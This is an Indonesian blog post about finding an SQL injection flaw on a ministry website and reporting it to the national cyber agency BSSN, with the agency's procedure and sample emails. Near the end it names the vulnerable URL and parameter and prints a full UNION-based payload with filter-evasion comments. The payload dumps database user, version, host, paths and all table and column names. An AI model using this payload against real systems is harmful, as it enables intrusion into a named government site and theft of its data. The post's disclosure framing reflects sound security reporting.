SQL Injection Kementrian | Bug Report

Posted on

SQL injection sampai saat ini masih menjadi salah satu serangan yang banyak dilakukan oleh para hacker, baik hacker jahat atau hacker baik. Jenis serangan ini dapat menimbulkan banyak kerugian karena rusaknya database dari sebuah situs web atau pun aplikasi. Hacker menggunakan teknik ini untuk mencuri informasi penting seperti username dan password, merubah database, memasukkan konten berbahaya, dan masih banyak lagi.

Apa itu SQL Injection ?

SQL injection adalah sebuah teknik hacking untuk mendapatkan akses pada sistem database yang berbasis SQL. SQL merupakan singkatan dari Structured Query Language yaitu bahasa yang digunakan untuk membuat serta mengolah database. Dalam melakukan teknik SQL injection, para hacker akan memanfaatkan celah keamanan pada web atau aplikasi . Mereka akan memasukkan perintah-perintah SQL ke dalam database mesin server sehingga mereka dapat masuk ke dalam sistem tanpa harus memiliki username dan password administrator. 

Waktu lalu, saya mendapatkan sebuah celah keamanan SQL Injection pada sebuah website Kementrian Indonesia, yang parahnya, website ini sama sekali tidak memakai kemanan waff jenis apapun, yang membuat saya sangat mudah untuk mengakses databasenya.

Saya lebih memilih untuk melaporkan bug ini kepada lembaga yang mengurus bagian cyber indonesia yang bernama ” BSSN ” Badan Siber & Sandi Negara.

Kenapa Memilih Di – report ?

Tidak ada alasan untuk kita semena” melakukan tindakan yang merugikan negeri sendiri, lebih baik demi kemajuan dan keamanan data indonesia, terutama karena ini menyangkut kepemerintahan, lebih baik dilaporkan, dan hal ini memungkinkan kita untuk mendapatkan apresiasi, baik seperti kaos ataupun sertifikat, yang tentunya akan lebih berguna, daripada kita merusaknya.

Bagaimana Cara Report Ke BSSN ?

https://bssn.go.id/aduan-siber/

Dilansir dari https://bssn.go.id/aduan-siber/ ada beberapa ketentuan bagaimana proses melakukan report bug kepada BSSN. Bisa dilihat dengan klik link diatas, atau lihat pada foto tersebut, beberapa Prosedurnya adalah

Baca Juga  Foremost Recover Deleted Data
  1. Penerimaan aduan insiden siber melalui telepon 021 78833610 atau surel [email protected].
  2. Pencatatan aduan insiden siber baik identitas pelapor disertai data dukung dan bukti terjadinya insiden siber.
  3. Notifikasi penerimaan aduan insiden siber.
  4. Verifikasi aduan insiden siber.
  5. Observasi dan investigasi aduan insiden siber.
  6. Pemberian rekomendasi cara penanggulanangan insiden siber.
  7. Jika administrator IT/pemilik aset tidak dapat menyelesaikan insiden siber dapat meminta BSSN untuk dapat membantu menindaklanjuti aduan insiden siber.

Proses Report Bug Kementrian Indonesia

Nama Lengkap : -
Tempat tinggal : -

Status di Instansi : -
Nama ayah/ ibu : -
Institusi : -
No telp : -

-------------------------------------------------------------

Salam damai, Perkenalkan saya < nama >, dari tim < jika ada >, ingin memberi tahukan kepada BSSN ( Badan siber dan sandi negara ) bahwa tyerdapat bug/ kerentanan pada website : < target >
yang termasuk dalam kerentana dengan tingkat < tingkat kerusakan >

dengan hormat, kami berharap bapak/ibu bersedia membalas pesan dari kami ini, dapat menghubungi :
email : -
wa : -
  1. Buatlah sebuah pesan yang menunjukan bahwa kalian mendapatkan celah keamanan pada website yang ingin kalian report, contoh emailnya seperti diatas.
  2. Usahakan menggunakan kalimat yang sopan dan mudah dimengerti.
  3. Tunggu sampai pihak dari BSSN Membalas email anda, contoh balasan dari BSSN adalah seperti dibawah ini.

Pada bagian ini, kalian akan menerima email seperti diatas, dan kalian akan diberikan sebuah file dengan format .docx yang harus kalian isi mengenai POC ” Proof Of Concept ” Dari website yang kalian pentest dengan rentang waktu 1x24jam. Usahakan untuk isi dengan apa yang diminta oleh BSSN, supaya bug yang kalian temukan dinyatakan valid oleh pihak terkait.

Saat kalian sudah mengirim POC tersebut, tunggulah sampai pihak BSSN menghubungi dan membalas pesan email kalian. Contoh email yang akan dikirim BSSN ketika POC sudah diterima, seperti dibawah ini :

Baca Juga  Nmap | Ping Scan ARP
Terima kasih telah menyampaikan aduan kerentanan kepada Pusopskamsinas BSSN.

Kami sampaikan bahwa aduan kerentanan Sql Injection pada website ---- telah kami terima sebelumya dan saat ini masih dalam proses lebih lanjut.

Jika anda menemukan kerentanan lainnya, mohon berkenan untuk menyampaikan kepada kami guna mendukung keamanan siber Indonesia yang lebih baik.

Demikian yang dapat kami sampaikan, atas perhatian dan kerja samanya kami ucapkan terima kasih.

 

Hormat Kami,

Pusopskamsinas BSSN 

(CK)

Nah, jika sudah seperti ini berarti poc yang anda laporkan sudah diterima oleh pihak BSSN, kalian tinggal menunggu kalau memang lagi beruntung, kalian akan mendapatkan apresiasi.

SQL Injection | Kementerian Pendidikan & Kebudayaan

http://lldikti7.ristekdikti.go.id/

Diatas ini adalah domain utamanya

http://lldikti7.ristekdikti.go.id/galeriDetail.php?id=81

Diatas ini adalah Path yang terdapat eror SQL Injection.

http://lldikti7.ristekdikti.go.id/galeriDetail.php?id=81%20UNION%20ALL%20SELECT%20NULL,concat(%27%3Ccenter%3E%27,%27%3Cimg%20src=%22%20https://k.top4top.io/p_1884riji11.jpg%22%20height=%22100px%22%20width=%22100px%22%27,%27%3C/center%3E%27,%27%3C/br%3E%27,%27%3Cfont%20color=%22red%22%20size=%225%22%3ETested%20By%20Anonre%3C/font%3E%27,%27%3C/br%3E%27,%27%3Cfont%20color=%22red%22%3EUser::%20%20%20%20%20%20%27,user/**_**/(),%27%3C/br%3E%27,%27%3Cfont%20color=%22blue%22%3EVersi::%20%20%20%20%27,%27%3C/font%3E%27,version/**_**/(),%27%3Cbr%3E%27,%27%3Cfont%20color=%22green%22%3EDatabase::%20%20%20%27,%27%3C/font%3E%27,database/**_**/(),%27%3C/br%3E%27,%27%3Cfont%20color=%22blue%22%3EHost::%20%20%20%27,@@HOSTNAME,%27%3C/font%3E%27,%27%3C/br%3E%27,%27%3Cfont%20color=%22green%22%3EDirectory::%20%20%20%20%20%20%27,@@BASEDIR,%27%3C/font%3E%27,%27%3C/br%3E%27,%27%3Cfont%20color=%22blue%22%3ESymlink::%20%20%20%20%27,@@HAVE_SYMLINK,%27%3C/font%3E%27,%27%3C/br%3E%27,%27%3Cfont%20color=%22green%22%3ESSL::%20%20%20%27,@@HAVE_OPENSSL,%27%3C/font%3E%27,%27%3C/br%3E%27,%27%3C/br%3E%27,(select(@x)/*!50000from*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000information_schema.columns*/)/*!50000where*/(table_schema=database/**_**/())and(0x00)in(@x:=/*!50000coNcat*/%20(@x,0x3c62723e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x)),NULL,NULL--%20-

Diatas ini adalah payload yang saya gunakan

Kesimpulan

Tetap menjadi seorang Pelaku IT yang bertindak sesuai dengan aturan” + etika” yang benar, jangan lakukan tindakan apapun yang merugikan, apalagi merugikan negara sendiri, lebih baik amankan, dan nyamankan.

Gravatar Image
Hi, Saya adalah seorang mahasiswa IT yang senang explorasi mengenai dunia IT.